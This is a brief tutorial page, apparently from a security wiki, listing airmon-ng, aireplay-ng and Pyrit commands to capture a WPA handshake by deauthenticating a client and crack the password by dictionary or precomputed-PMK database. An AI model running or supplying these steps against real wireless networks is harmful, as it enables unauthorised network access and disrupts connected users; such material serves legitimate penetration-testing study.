pyrit_attack

PYRIT ATTACK

Pyrit Attack

Place your wireless card into monitor mode on the channel number of the AP:

airmon-ng start

Use Pyrit to sniff on the monitor mode interface, saving the capture to a file:

pyrit -r -o stripLive

Deauthenticate a connected client to force it to complete the 4-way handshake:

aireplay-ng -0 1 -a -c

Run Pyrit in dictionary mode to crack the WPA password:

pyrit -r -i -b attack_passthrough

To use Pyrit in database mode, begin by importing your wordlist:

pyrit -i import_passwords

Add the ESSID of the access point to the Pyrit database:

pyrit -e create_essid

Generate the PMKs for the ESSID:

pyrit batch

Launch Pyrit in database mode to crack the WPA password:

pyrit -r -b attack_db

Last updated

Was this helpful?